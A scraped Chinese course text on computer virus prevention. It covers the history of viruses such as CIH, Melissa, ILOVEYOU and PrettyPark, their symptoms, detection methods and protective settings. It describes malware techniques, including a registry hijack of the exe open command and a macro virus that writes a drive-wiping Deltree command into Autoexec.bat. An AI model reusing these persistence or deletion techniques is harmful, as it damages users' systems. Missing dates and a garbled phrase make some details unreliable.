来源:蜘蛛抓取(WebSpider)
时间:2018-03-16 10:09
标签:
何为计算机程序
计算机病毒防范的概念
课题组成员:周宇良、罗王亮、仁卓昌、李敬宜
随着计算机及计算机网络的发展,伴随而来的计算机病毒传播问题越来越引起人们的关注。随因特网的流行,有些计算机病毒借助网络爆发流行,如CIH计算机病毒、“爱虫”病毒等,它们与以往的计算机病毒相比具有一些新的特点,给广大计算机用户带来了极大的损失。
当计算机系统或文件染有计算机病毒时,需要检测和消除。但是,计算机病毒一旦破坏了没有副本的文件,便无法医治。隐性计算机病毒和多态性计算机病毒更使人难以检测。在与计算机病毒的对抗中,如果能采取有效的防范措施,就能使系统不染毒,或者染毒后能减少损失。
计算机病毒防范,是指通过建立合理的计算机病毒防范体系和制度,及时发现计算机病毒侵入,并采取有效的手段阻止计算机病毒的传播和破坏,恢复受影响的计算机系统和数据。
计算机病毒利用读写文件能进行感染,利用驻留内存、截取中断向量等方式能进行传染和破坏。预防计算机病毒就是要监视、跟踪系统内类似的操作,提供对系统的保护,最大限度地避免各种计算机病毒的传染破坏。
老一代的防杀计算机病毒软件只能对计算机系统提供有限的保护,只能识别出已知的计算机病毒。新一代的防杀计算机病毒软件则不仅能识别出已知的计算机病毒,在计算机病毒运行之前发出警报,还能屏蔽掉计算机病毒程序的传染功能和破坏功能,使受感染的程序可以继续运行(即所谓的带毒运行)。同时还能利用计算机病毒的行为特征,防范未知计算机病毒的侵扰和破坏。另外,新一代的防杀计算机病毒软件还能实现超前防御,将系统中可能被计算机病毒利用的资源都加以保护,不给计算机病毒可乘之机。防御是对付计算机病毒的积极而又有效的措施,比等待计算机病毒出现之后再去扫描和清除更有效地保护计算机系统。
计算机病毒的工作方式是可以分类的,防杀计算机病毒软件就是针对已归纳总结出的这几类计算机病毒工作方式来进行防范的。当被分析过的已知计算机病毒出现时,由于其工作方式早已被记录在案,防杀计算机病毒软件能识别出来;当未曾被分析过的计算机病毒出现时,如果其工作方式仍可被归入已知的工作方式,则这种计算机病毒能被反病毒软件所捕获。这也就是采取积极防御措施的计算机病毒防范方法优越于传统方法的地方。
当然,如果新出现的计算机病毒不按已知的方式工作,这种新的传染方式又不能被反病毒软件所识别,那么反病毒软件也无能为力了。这时只能采取两种措施进行保护:第一是依靠管理上的措施,及早发现疫情,捕捉计算计算机病毒,修复系统。第二是选用功能更加完善的、具有更强超前防御能力的反病毒软件,尽可能多地堵住能被计算机病毒利用的系统漏洞。
计算机病毒防范工作,首先是防范体系的建设和制度的建立。没有一个完善的防范体系,一切防范措施都将滞后于计算机病毒的危害。
计算机病毒防范体系的建设是一个社会性的工作,不是一两个人、一两家企业能够实现的,需要全社会的参与,充分利用所有能够利用的资源,形成广泛的、全社会的计算机病毒防范体系网络。
计算机病毒防范制度是防范体系中每个主体都必须的行为规程,没有制度,防范体系就不可能很好地运作,就不可能达到预期的效果。必须依照防范体系对防范制度的要求,结合实际情况,建立符合自身特点防范制度。
电脑中毒的十大症状
电脑中毒的十大症状
时下电脑感染病毒的途径,已经由原始的磁盘带入,变为现在承受多种渠道同时攻击,几乎到了防不胜防的地步。有些病毒行踪诡秘、深藏不露;更多的则显山露水,用家细心观察,不难抓住其蛛丝马迹,及早防范,可免遭其害。电脑中毒的十大症状:
1.平时运行好端端的电脑,却变得迟钝起来,反应缓慢,出现蓝屏甚至死机。
2.程序载入的时间变长。有些病毒能控制程序或系统的启动程序,当系统刚开始启动或是一个应用程序被载入时,这些病毒将执行它们的动作,因此要花更多的时间来载入程序。
3.可执行程序文件的大小改变了。正常情况下,这些程序应该维持固定的大小,但有些病毒会增加程序文件的大小。
4.对同样一个简单的工作,磁盘却花了要长得多的时间才能完成。例如,原本储存一页的文字只需一秒,但感染病毒可能会花更多的时间来寻找未感染的文件。
5.没有存取磁盘,但磁盘指示灯却一直在亮。硬盘的指示灯无缘无故一直在亮着,意味着电脑可能受到病毒感染了。
6.开机后出现陌生的声音、画面或提示信息,以及不寻常的错误信息或乱码。尤其是当这种信息频繁出现时,表明你的系统可能已经中毒了
7.系统内存或硬盘的容量突然大幅减少。有些病毒会消耗可观的内存或硬盘容量,曾经执行过的程序,再次执行时,突然告诉你没有足够的内存可以利用,或者硬盘空间意外变小。
8.文件名称、扩展名、日期、属性等被更改过。
9.文件的内容改变或被加上一些奇怪的资料。
10.文件离奇消失。
计算机病毒防范基础知识
两个触目惊心的事例
& 例1:在本世纪末的日CIH计算机病毒凶猛地扑向全球未设防的计算机和网络系统,全世界至少有6000万台计算机遭受到它的侵害,国内(不包括台湾、香港及澳门地区)受损的计算机总量达到了36万台,其中主板的受损比例为15%。所造成的直接经济损失为0.8亿元。
& 例2:据上海电视台日晚间新闻报道,“5月6日中国远洋集装箱运输有限公司受到爱虫计算机病毒的攻击,估计有4万5千条爱虫通过电子邮件进入公司数百个用户邮箱,绝大部分爱虫病毒来自西欧北美公司。”
&&&&&&& CIH和爱虫计算机病毒
造成全世界电脑瘫痪和经济损失情况
全球危及电脑
第一章:计算机病毒基本知识
计算机病毒的定义:
《中华人民共和国计算机信息系统安全保护条例》第二十八条中明确指出:
“计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。”
& 此定义具有法律性、权威性。
广义的计算机病毒:
& 随着Internet技术的发展,计算机病毒的定义正在逐步发生着变化,与计算机病毒的特征和危害有类似之处的“特洛依木马”和“蠕虫”从广义的角度而言也可归为计算机病毒。
特洛伊木马(Trojan horse)又称为黑客程序,是一种潜伏执行非授权功能的技术,它在正常程序中存放秘密指令,使计算机在仍能完成原先指定任务的情况下,执行非授权功能。
& “蠕虫”(Worm)是一个程序或程序序列,通过分布式网络来扩散传播特定的信息或错误,进而造成网络服务遭到拒绝并发生死锁或系统崩溃。
计算机病毒的历史(国外概述)
& 1983年出现了研究性计算机病毒报告。
& 1987年,世界各地的用户几乎同时发现了形形色色的计算机病毒,如大麻、IBM圣诞树、黑色星期五等等。
& 日,一种苹果机的病毒发作,这天受感染的苹果机停止工作,以庆祝苹果机生日。
& 1990年1月发现首例隐藏型病毒“4096”,它不仅攻击程序还破坏数据文件。
& 1991年发现首例网络病毒“GPI”,它突破了NOVELL公司的Netware网络安全机制。
& 1992年,多态性病毒蜂拥而起,最早最著名的是“黑夜复仇者―Dark
Avenger”;也出现了针对杀毒软件的“幽灵”病毒,如One-Half。还有一种实现机理与以往的文件型病毒有明显区别的DIR2病毒,该病毒的传染速度、传播范围及其隐蔽性堪称所有病毒之首。
& 1995年以后,欧美连续发现多种更高级的能变换自身代码的变形病毒,如Stealth(诡秘)、Mutation
Engine(变形金刚)、Fear(恐怖)、Satan(恶魔)、Tremor(地震)、Ghost/One-Half/3544(幽灵)病毒等。
& 1996年以来,出现针对微软Office的Word宏病毒并迅速发展
& 1998年,出现针对Windows95/98系统的病毒,如CIH,该年被业界公认为“CIH计算机病毒年”。
& 1999年3月美国发生了历史上第2次重大的计算机病毒灾难。一种叫美丽杀手的邮件病毒借助因特网进行了一次爆炸性传播,一天即传遍美国。大批网络由于病毒的疯狂入侵,不堪重负而瘫痪。政府机关、企业、公共信息系统等损失惨重。
计算机病毒的历史(国内概述)
& 1989年初,大连市统计局的计算机上发现有小球病毒。当年3、4月间,重庆西南铝加工厂也有了关于病毒的报道。此后,计算机病毒以迅猛之势在中国大陆蔓延。
&& 据1989年11月《中国日报》报道,我国40多万台计算机系统中,约有1/10以上染有计算机病毒,而且在沿海各省市传播的范围远比内地要广泛得多。
& 1992年初,黑色星期五病毒、米氏病毒袭击了国内众多单位的计算机网络,某民航飞机订票处的航班资料受到严重损害,造成一片混乱。
& 月间,国外传入的“FLIP”病毒又在兰州一些单位计算机中传播,这种危害性很大、传播相当迅速的恶性病毒,当时国内的杀毒软件尚无法将其有效清除。不久,“FLIP”病毒蔓延至其它地区。
& 随后,DIR2、DIR2-3、DIR2-6、NEW DIR2病毒以一种全新的面貌出现,它们直接修改DOS关键中断的内核,修改可执行文件的首簇数,将文件名字与文件代码主体分离,从而感染可执行文件。
& 日CIH病毒于大爆发,这种主要传染Win95/98系统的恶性病毒破坏力极强,不仅删除硬盘中的文件,同时还将删除BIOS芯片中的系统程序。
& 2000年的5月4日,一种通过国际互连网电子邮件功能传播的“爱虫”病毒迅速在世界各地蔓延,造成全世界(包括我国在内)空前的计算机系统破坏。
计算机病毒的生命周期
创造期:编制者花数日数周努力研究出一种可广为散布的有害程序,新病毒诞生
孕育期:病毒被放在一些容易散播的地方
潜伏感染期:病毒不断地繁殖与传染
发作期:一切条件形成,病毒开始破坏行动
发现期:一旦病毒发作,也就是它被发现的时期
同化期:杀毒软件能够检测到这种新计算机病毒
根除期:使用了能检测及控制这种病毒的杀毒软件,病毒就有可能被根除
计算机病毒的特性
传染性:最重要的特性,与生物病毒类似
破坏性:最重要特性之二
隐蔽性:代码短,传播快,难发现
潜伏性:潜伏愈久,传播愈广。需要触发条件
针对性:针对特定操作系统、特定机种(PC)
衍生性:变种 ,升级
寄生性:依赖于宿主程序而生存、传播
不可预见性:计算机病毒防范软件似乎永远滞后于计算机病毒的发展
病毒隐蔽性两个表现
& (1)传播快,下手快:如磁盘杀手(Disk Killer)
病毒,当它破坏磁盘数据时,屏幕上显示如下信息:
磁盘杀手1.00版
OgreSoftware公司日出版
在处理过程中不要关机或取出磁盘
正在处理……
这时病毒锁定键盘,对磁盘上的数据做加密变换处理。计算机的处理速度很快,当你在屏幕上见到上述显示信息时,已经有很多数据被破坏掉了。
& (2)精巧而又短小:典型的是Tiny家族。这个家族的计算机病毒都很短小,最小的病毒代码长度只有133字节
计算机病毒的触发
* 时间、日期作触发条件
* 计数器作触发条件
* 特定操作作为触发条件
* 综合触发条件
计算机病毒的传播途径
* 不可移动的计算机硬件设备:专用集成电路芯片(ASIC)
* 移动存储设备:软盘、磁带、CD-ROMs、ZIP和JAZ等
* 网络:电子邮件、 BBS、 WWW浏览、FTP文件下载、新闻组
* 通过点对点通信系统和无线通信系统传播
传播途径的统计
计算机病毒的主要危害
* 攻击系统数据区:硬盘主引寻扇区(MBR)、引导扇区、文件分配表(FAT)、文件目录。如果攻击系统数据区的是恶性病毒,受损的数据不易恢复
对于文件的攻击:对文件进行删除、重命名、更换内容、修改部分代码等操作,受到攻击的文件一般无法修复
* 影响系统运行速度:使系统的运行明显变慢
* 破坏磁盘:包括格式化磁盘、无法写入、写入时数据丢失等
* 扰乱屏幕显示:字符倒置、屏幕抖动、图形翻转显示等
键盘和鼠标工作不正常:包括键盘和鼠标封锁、键盘字符混乱、抹掉缓冲区字符等
* 攻击CMOS: 改写、擦除
* 干扰外设的工作,尤其是打印机
计算机病毒的分类
(1)文件型计算机病毒
(2)引导型计算机病毒
(3)宏病毒
(4)目录(链接)计算机病毒
(5)恶意代码
第二章:计算机病毒的发展趋势
计算机病毒的新特点
* 基于“视窗”的计算机病毒越来越多
* 新病毒种类不断涌现,数量急剧增加
* 传播途径更多,传播速度更快
* 造成的破坏日益严重
* 电子邮件成为传播的主要媒介
计算机病毒的技术特征
* 一般会采用内存、中断、自加密和反跟踪技术。
* 最新的还有采用特殊的“隐形”技术,和专门对抗病毒防范系统的技术。
当采用“隐形”技术的病毒处在内存中时:
(1)不用专用软件或手段去检查,几乎感觉不内存可用容量的减少。
(2)染毒文件的日期和时间不发生变化。
(3)用DIR命令看不见病毒感染文件长度的增加。
(4)查看被该病毒感染的文件,看不到病毒程序代码,只看到正常文件的程序代码。给人以错觉,好像没有病毒代码附着在上面。
(5)查看被病毒感染的引导扇区,只看到正常的引导扇区,看不到实际上处于引导扇区位置的病毒程序。
(6)病毒防范程序和其它工具程序检查不出中断向量被病毒接管,但实际上病毒代码已链接到系统的中断服务程序中。
新型计算机病毒的技术特征
传统型病毒的共同特色,就是一定有一个「宿主」程序,所谓宿主程序就是指那些让计算机病毒藏身的地方。最常的如一些可执行文件(.EXE.COM)。但是由于微软的WORD愈来愈流行,且所提供的宏功能又很,使用WORD宏写出来的病毒也愈碛啵沟煤笞好.DOC的也会成为宿主程序。尤其是近年来流行的宏病毒。相对于传统病毒,新型病毒完全不需要宿主程序,如果硬要说它寄生在哪里,或许只能说它是寄生在「Internet」上吧。
1999年主要计算机病毒回顾
HAPPY99计算机病毒(I-WORM.HAPPY)
类型:蠕虫、特洛依木马
特征:Happy家族中的一员,感染Win 95/98计算机。却不能运行于Win
NT下。通过Internet传播,能将自己附在电子邮件中并在用户不知情的情况下发送出去。Happy
99在每年圣诞节进行传播,让接收者误认为是新年的祝福。它会显示一个放烟花的窗口,但不会造成任何破坏性影响。
& 病毒发作时,在windows\system目录中可找到“ska.exe”和“ska.dll”两个新文件,及一个扩展名为ska的文件“wsock32.ska”。
这就是被Happy99感染的主要表现。
Melissa(“美丽莎”)计算机病毒
类型:宏病毒
“美丽莎”病毒在1999年大肆泛滥,它虽是一个宏病毒,但却会通过不断地从染毒计算机中向外发送电子邮件,破坏电子邮件系统。
& 感染Word 97/2000文档,及其通用文档模板normal.dot。传播速度极为迅速,它会以用户地址簿中前50个地址来继续发送含毒文件。
& 第一症状是收到一封标题为“来自XXX的重要消息”的邮件,附件中包含带毒的文件。但这只是病毒到达的信号,尚未真正感染!所以,千万不要直接打开附件,最好将其删除。
Trojan.BackOrifice(简称BO)
类型:特洛依木马
& 一个后门(Backdoor)特洛依木马,可使恶意用户从远程系统对计算机进行某些操作。它包含三个程序:
& BOSERVE.EXE (安装在受感染的用户计算机中),
& BOCLIENT.EXE 和 BOCONFIG.EXE。
症状:一旦特洛依木马开始工作,客户端和服务器端程序会建立一个连接,使恶意用户从远程获取系统的控制权,在受感染计算机中执行许多操作:传输文件、修改注册表、删除程序和文件夹等。
CIH(又称W95/CIH)
类型:驻留型计算机病毒
特征:属于W32家族,感染Win95/98中以EXE为后缀的文件。具有极大破坏性,可重写BIOS,使计算机无法启动。遭破坏计算机启动时会提示:“DISK
BOOT FAILURE, INSERT SYSTEM DISK AND PRESS ENTER”。如果用户从软盘引导并试图访问硬盘,又会出现“INVALID
DRIVE SPECIFICATION”。 病毒代码中包含字符串“CIH v1.2 TT IT”。该病毒于4月26日发作,它还会破坏计算机硬盘中的所以信息。
该病毒的第一个变种称为CIH v1.3或CIH.1010,会在6月26日发作,其代码中包含
“CIH v1.3 TT IT”字符串。
第二个变种称为 CIH v1.4或CIH.1019,在每个月的26日发作,具有更大破坏性。它将删除Flash-BIOS
中所有信息,使计算机连系统盘都找不到。而破坏硬盘信息的方式是重写其中的内容!该变种的代码中包含字符串:“CIH
v1.4 TATUNG”。
July.killer
类型:宏病毒
特征:感染Microsoft Word 97文档和NORMAL.DOT通用模板。作为宏病毒,它将感染所有与之相关的Word文档。
与其他宏病毒不同的是:当首次打开带毒文件,病毒会在C盘根目录下复制一个名为Autoexec.bat的病毒附本,该文件中包含病毒的所有代码。
症状:染毒后,一旦系统时间为七月份的任何一天,用户使用WORD打开染毒文档时,就会弹出一个标题为“醒世恒言”的简体中文对话框,并强迫用户点击“确定”按钮表示同意对话框中的观点,否则,如果点击三次“取消”,病毒会将C盘根目录下的Autoexec.bat的内容替换为“Deltree
& 当用户再次启动计算机时,C盘下的所有文件都将被删除。
类型:宏病毒
特征:W97M家族一员,感染Microsoft Word 97文档和NORMAL.DOT通用模板。它会首先感染模板文档,之后所有基于模板的文档都将被感染。
感染后,病毒会关闭Word的宏病毒保护功能,这样,当打开一个包含宏的文档时,Word将不会提示用户,同时,它会阻止所有可能修改宏的选项。
病毒将会在12月13日发作,如果这一天打开染毒的文件,它将会删除C盘中的所有文件,所以又称C盘杀手;但不会删除包含system
(S)、hidden (H)或read-only (R)属性的文件。
症状:为了检测某个文档是否已经被感染,病毒会查找‘Thus_001’字符串,如果没找到该字符串,病毒将会对此文档进行感染。
2000年新计算机病毒介绍
僵死你 - ZOMBIE
一种称为“僵死你”(zombie)的新黑客程序在美国发现,它可将他人的电脑转变成电子邮件炸弹发送器,造成网路阻塞。
这个新病毒掩饰成录像或其他可下载的文件,一旦开启后,就会把电脑转换成反应迟钝的电脑,任由黑客控制。
“W97M_Resume.A”
此病毒于5月27日凌晨在美国透过E-mail扩散,它类似梅莉莎病毒感染方式,但破坏力更大,病毒除了企图经由感染者的Microsoft
Outlook发出自动信件,还会删除所有磁盘中的全部档案,造成计算机无法运行。该病毒所散播的E-mail标题为
“履历表 - Janet Simons” (Resume- Janet Simons),附件名称 “Explorer.doc”,收信人一旦执行附件,即遭病毒感染。
美丽公园”病毒 ―― W32/PrettyPark
潜伏于邮件附件中,一个叫“prettypark.exe”的可执行程序。一旦执行了,病毒就会将自己安装在系统中,并向Windows地址簿中的用户发送含病毒电子邮件。同时会告知用户某些IRC
(Internet Relay Chat Protocol)通道的系统设置和口令,因此具有了特洛依木马的特点。
病毒安装时,将自己(Files32.vxd)复制到Windows\system目录下,并在注册表中修改键值:HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\EXEFILE\SHELL\OPEN\COMMAND
原先键值为“%1” %*,病毒将其改为 FILES32.VXD “%1”
%* 。尽管该文件是以VxD后缀,但却是一个可执行文件。使得系统在加载任何程序时都运行该文件。
发作时,会向地址簿中的所有地址发送一封包含PrettyPark.exe附件的邮件;同时,它会每个30秒试图建立一个IRC连接,病毒内部会包含13个IRC服务器的列表,一旦建立连接,就会将本机的信息发送给一个聊天服务的用户,这样,病毒编制者就可以获取系统信息并监视受感染的计算机系统。
情书(Loveletter) 又名I LOVE YOU
在日晚,一只名为“VBS_LOVELETTER”(又名为I LOVE
YOU)新病毒,透过电子邮件,迅速地在全球各地扩散。这只由VB
Script程序语言所撰写的新病毒,传播途径类似99年3月酿成巨灾的“梅莉莎”病毒,主要通过一封标题为
“ILOVEYOU”(我爱你) 的电子邮件散播,附件为
“LOVE-LETTER-FOR-YOU.txt.vbs” (献给你的情书)。收信者一旦执行附件,病毒会经由被感染者Outlook通讯簿的名单发出自动信件,藉以连锁性的大规模散播,造成企业邮件服务器瘫痪。病毒发作时,会感染并覆写后缀为:*.mp3,
*.vbs, *.jpg, *.hta, *.vbe, *.js, *.jse…等十种档案格式;档案遭到覆盖后,后缀名会改为
2001年:病毒之年
* 到今年5月9日止,在电子邮件中发现的病毒总数已达到185,000个,超过了2000年全年的数量(据病毒扫描公司MessageLabs
SkyScan统计)。
* 带毒邮件的比例已大幅升高,去年是大约每1500封电子邮件含有一个病毒,现在这一数字已降低到1000封。
* 新病毒的炮制速度也正在加快,去年每月大约有1000种新病毒“问世”,如今已达到1200种左右(反病毒公司Sophos专家指出)
* 去年臭名昭著的“爱虫”病毒因其传播范围之广,而成为有史以来最“成功”的病毒。今年2月份开始传播的“库尔尼科娃”病毒和近日发现的“主页”病毒与“爱虫”相比也毫不“逊色”。
专家指出,网络的普及性、软件的单一性(以Windows和Outlook为主)及病毒制造的简易性是加剧病毒传播的三大原因。就最后一个原因来说,利用病毒编写“工具包”,任何电脑用户都可使用简单的“拖放工具”炮制出新病毒,“库尔尼科娃”和“主页”病毒就是用一种类似“OnTheFly”工具包制造出来的。
“库尔尼科娃”病毒邮件在网上迅速传播
& 20001年伊始,一种名为“Onthefly”的蠕虫病毒已悄悄登陆互联网,正以惊人的速度通过电子邮件在网上扩散。这种病毒利用加密术隐藏自身,更为狡猾的是,它假借网坛巨星库尔尼科娃的名义在网上传播,其扩散速度堪与去年来势汹汹的“爱虫”病毒“媲美”。
带毒邮件的主题为“Here you have, :o);”,正文写道“Hi:Check
This!”,并带有一个名为“AnnaKournikova.jpg.vbs”的附件。一旦打开附件,出现的可不是金发碧眼的库尔尼科娃的玉照,而是一种会向Outlook地址簿内所有联系人发送一封带毒邮件的病毒。
由这种病毒产生的大量电子邮件会使网络超负荷,并可能导致电子邮件服务器瘫痪。
“主页HomePage”电脑病毒袭全球
&& 国外反病毒公司5月9日发出病毒警报称,一种新的电脑蠕虫病毒正通过电子邮件在全球迅速传播。
携带这种电脑病毒的邮件题目为“主页”,邮件正文写道:
“嗨,你应该看看这个网页,它确实很酷”
& 邮件中夹带着一个名为“HOMEPAGE.HTML.VBS”的附件。万一用户打开这个附件,病毒第一步先自我复制,并向微软OUTLOOK地址簿中的每一个地址发去一封携毒邮件。然后搜索OUTLOOK收件箱,将其中名为“主页”的信件统统删除,同时打开数个色情网页。据报告,此病毒已经袭击了欧洲、北美和亚洲等地的14000台电脑。
第三章:计算机病毒的防范
计算机病毒防范的概念
计算机病毒防范,是指通过建立合理的计算机病毒防范体系和制度,及时发现计算机病毒侵入,并采取有效的手段阻止计算机病毒的传播和破坏,恢复受影响的计算机系统和数据。
计算机病毒的表现现象
* 平时运行正常的计算机突然经常性无缘无故地死机
* 操作系统无法正常启动
* 运行速度明显变慢
* 以前能正常运行的软件突然经常发生内存不足、或非法错误
* 打印和通讯发生异常
* 无意中要求对软盘进行写操作
* 系统文件的时间、日期、大小发生变化
* 运行Word,打开Word文档后,该文件另存时只能以模板方式保存
* 磁盘空间迅速减少
* 网络驱动器卷或共享目录无法调用
* 基本内存发生变化
* 陌生人发来的电子函件
* 自动链接到一些陌生的网站
* 发出一段的音乐
* 产生特定的图象
* 硬盘灯不断闪烁
* 进行游戏算法
* Windows桌面图标发生变化
* 计算机突然死机或重启
* 自动发送电子函件
* 鼠标自己在动
* 硬盘无法启动,数据丢失
* 系统文件丢失或被破坏
* 文件目录发生混乱
* 部分文档丢失或被破坏
* 部分文档自动加密码
* 计算机硬盘被格式化
* 使部分可软件升级主板的BIOS程序混乱,主板被破坏
* 网络瘫痪,无法提供正常的服务
从表现形式和传播途径发现计算机病毒!
计算机病毒的技术防范
计算机病毒的技术预防措施:
* 新购置的计算机硬软件系统要作查毒测试
* 在保证硬盘无病毒的情况下,尽量使用硬盘引导系统
对重点保护的计算机系统应做到专机、专盘、专人、专用,封闭的使用环境中是不会自然产生病毒的
* 重要数据文件要有备份
不要随便直接运行或直接打开电子邮件中夹带的附件文件,不要随意下载软件,尤其是一些可执行*
文件和Office文档。如果下载了,要先用最新的防病毒软件来检查
计算机网络的安全使用
安装网络服务器时,应保证无毒环境,即安装环境和网络操作系统本身没有感染病毒
* 一定要用硬盘启动网络服务器
服务器文件系统应划分成多个文件卷,至少分成操作系统卷、共享的应用程序卷和各个网络用户可以独占的用户数据卷
为各个卷分配不同的用户权限。将操作系统卷,应用程序卷设成对一般用户为只读权限。不经授权、不经病毒检测,就不允许在其中安装程序。使网络用户有一个安全的联网工作环境。
在网络服务器上安装真正有效的防病毒软件,并经常进行升级。
系统管理员对网络内的共享电子邮件系统、共享存储区域和用户卷应定期进行病毒扫描,发现异常及时处理。
引导型病毒的防范
预防引导型病毒,通常采用的方法:
* 坚持从不带病毒的硬盘引导系统
* 安装能够实时监控引导扇区的防杀病毒软件
* 经常备份系统引导扇区
* 启用某些底板上提供的引导扇区病毒保护功能(Virus Protect)
文件型病毒的防范
对于文件型病毒防范,一般采用以下一些方法:
安装最新版本、有实时监控文件系统功能的防病毒软件。
及时更新病毒引擎,一般每月至少更新一次,最好每周更新一次,并在有病毒突发事件时立即更新。
(3) 经常使用防毒软件对系统进行病毒检查。
对关键文件,如系统文件、重要数据等,在无毒环境下经常备份。
在不影响系统正常工作的情况下对系统文件设置最低的访问权限。
(6) 当使用Win9X/2000/NT操作系统时,修改文件夹窗口中的确省属性:打开“我的电脑”,选择“查看”菜单中的“文件夹选项”栏。在“查看”中选择“显示所有文件”
& 不选中”隐藏已知文件类型的文件扩展名”
& 按“确定”按钮
宏病毒的防范
& 只要在使用Office套装软件前进行一些正确的设置,就基本上能够防止宏病毒的侵害:
(1) 在Word中打开“选项”中的“宏病毒防护”和“提示保存Normal模板”;清理“工具”-&“模板和加载项”-&“共用模板及加载项”中预先加载的文件,不必要的就不加载,必须加载的则要确保没有宏病毒的存在,并且确认没有选中“自动更新样式”选项;退出Word,此时会提示保存Normal.dot模板,按“是”按钮,保存并退出Word;找到Normal.dot文件,将文件属性改成“只读”。
(2) 在Excel中选择“工具”-&“选项”-&“常规”中选中“宏病毒防护功能”。
(3) 在PowerPoint中选择“工具”-&“选项”-&“常规”中选中“宏病毒防护”。
(4) 其他防范文件型病毒所做的工作。
& 做了以上工作后,对打开提示有“是否启用宏”,除非能够完全确信文档中只包含明确没有破坏意图的宏,否则都不执行宏;而对退出时提示“保存除文档以外的文件”,如Normal.dot模板等,一律不予保存。
电子邮件病毒的防范
(1) 不要轻易执行附件中的EXE和COM等可执行程序。对于朋友和陌生人发来的电子邮件中的程序附件都必须检查,确定无异后才可使用。
不要轻易打开附件中的文档文件。收到的电子邮件及相关附件的文档,首先要用“另存为…”命令保存到本地硬盘,待用查病毒软件检查无毒后才可打开使用。如果点击DOC、XLS等附件文档,自动启用Word或Excel时有“是否启用宏”的提示,那绝对不要轻易打开,否则极有可能传染上电子邮件病毒。
(3) 对于文件扩展名很怪的附件,或者是带有脚本文件如*.VBS、*.SHS等的附件,千万不要直接打开,一般可以删除这些电子邮件。
(4) 使用Outlook作为收发电子邮件软件时,应作一些必要的设置。选择“工具”-“选项”-“安全”中设置“附件的安全性”为“高”;在“其他”-“高级选项”-“加载项管理器”,不选中“服务器脚本运行”。最后按“确定”按钮保存设置。
(5) 如使用Outlook Express作为收发电子邮件软件,也应作一些必要的设置。选择“工具”-“选项”-“阅读”中不选中“在预览窗格中自动显示新闻邮件”和“自动显示新闻邮件中的图片附件”。这样可以防止有些电子邮件病毒利用Outlook
Express的缺省设置自动运行,破坏系统。
(6) 对于使用Win98操作系统的计算机,在“控制面板”的“添加/删除程序”中检查一下是否安装了Windows
Scripting Host。如安装请卸载,并检查Windows的安装目录下是否存在Wscript.exe文件,如有也要删除。因为有些电子邮件病毒就是利用Windows
Scripting Host进行破坏的。
对于自己往外传送的附件,也一定要仔细检查,确定无毒后,才可发送。
计算机病毒检测方法
用原始备份与被检测引导扇区或文件作比较。看长度,内容变化。简便,不需专用软件。但无法确认病毒的种类名称。
加总比对法:将每个程序的文件名、大小、时间、日期及内容,加总为一个检查码,附于程序后;再利用此对比系统,追踪记录每个程序的检查码是否遭更改,判断是否感染病毒。
& 搜索法:用每一种病毒体含有的特定字符串对被检测的对象进行扫描。如果在对象内部发现了某一种特定字节串,就表明发现了该字节串所代表的病毒。缺点:1.扫描费时;2.特征串不易选;3.特征库不断升级;4.对变种病毒低效;5.易产生误报;6.
难识别多维变形病毒。但它仍是今天用得最普遍的查毒方法。
& 分析法:静态分析和动态分析。利用反汇编工具和DEBUG等调试工具进行…...防病毒专业技术人员所使用的一整套剖析方法。可发现新病毒,提取特征字串,制定防杀措施方案。
人工智能陷阱技术和宏病毒陷阱技术:
监测计算机行为的常驻式扫描技术。它将所有病毒所产生的行为归纳起来,一旦发现内存中的程序有任何不当的行为,系统就会有所警觉,并告知使用者。优点:速度快、操作简便,可侦测到各式病毒;缺点:程序设计难,且不易考虑周全。
宏病毒陷阱技术(MacroTrap)是结合了搜索法和人工智能陷阱技术,依靠行为模式来侦测已知及未知的宏病毒。其中,配合OLE2技术,可将宏与文件分开,使得扫描速度变得飞快,而且更可有效地将宏病毒彻底清除。
& 软件仿真扫描法:专门用来对付多态变形病毒。该病毒在每次传染时,都将自身以不同的随机数加密于每个感染的文件中,传统搜索法根本就无法找到它。软件仿真技术则是成功地仿真CPU执行,在DOS虚拟机下伪执行病毒程序,安全并确实地将其解密,使其显露本来的面目,再加以扫描。
& 先知扫描法:是继软件仿真后的一大技术突破。既然软件仿真可以建立一个保护模式下的DOS虚拟机,仿真CPU动作并伪执行程序以解开多态变形病毒,那么应用类似的技术也可以用来分析一般程序,检查可疑的病毒代码。因此先知扫描技术将专业人员用来判断程序是否存在病毒代码的方法,分析归纳成专家系统和知识库,再利用软件模拟技术伪执行新的病毒,超前分析出新病毒代码,对付以后的病毒。
病毒感染后的一般修复处理方法
1、对系统破坏程度先有一个全面了解,根据破坏程度决定方法对策:重装系统、启用杀毒软件、或请防病毒专家进行清除和数据恢复作。
2、修复前,尽可能再次备份重要的数据文件。不与平时的常规备份混在一起。
3、启动杀病毒软件,并对整个硬盘进行扫描。使用事先准备的干净DOS系统软盘启动系统。
4、如果可执行文件中的病毒不能被清除,一般应将其删除,然后重装相应的应用程序。
5、杀毒完成后,重启计算机,再次用杀毒软件检查系统。
6、对无法杀除的病毒,应将病毒样本送交杀毒软件厂商的研究中心,以供详细分析。
* 马上关机(Power Off)
* 以一张“绝对”干净的启动软盘重新开机
* 备份重要资料,程序
* 用侦毒软件进行扫描
* 对症下药
我们的忠告:
病毒是多变的,会不断创造新的病毒代码
任何防毒技术都会有时间上的和技术上的局限性
不断升级仍是目前唯一的办法
第四章:计算机病毒防范技术重点措施介绍
单机的防范
1、选择一个功能完善的单机版防杀病毒软件
* 拥有病毒检测扫描器
* DOS平台的病毒扫描器
* 32位计算机病毒扫描器
* 实时监控程序
* 未知病毒的检测
* 压缩文件内部检测
* 文件下载监视
* 病毒清除能力
* 病毒特征代码库升级
* 重要数据备份
* 定时扫描设定
* 支持FAT32和NTFS等多种分区格式
* 关机时检查软盘
* 还必须注重病毒检测率
2、 主要的防护工作
* 设置BIOS,将引导次序改为硬盘先启动(C:A:)
* 关闭BIOS中的软件升级支持(如果底板上有此跳线)
* 用DOS平台杀病毒软件检查系统,确保没有病毒存在
* 安装正版防病毒软件,并经常升级
* 经常更新病毒特征代码库
* 备份系统中重要的数据和文件
* 在Word中将「宏病毒防护」选项打开,并打开「提示保存Normal模板」,退出Word,将Normal.dot文件的属性改成只读
* 在Excel和PowerPoint中将「宏病毒防护」选项打开
* 若用Outlook express收发电子函件,应关闭信件预览功能
* 在IE或Netscape等浏览器中设置合适的因特网安全级别,防范来自ActiveX和Java
Applet的恶意代码
* 对外来软盘、光盘和网上下载软件等都应先查病毒,后使用
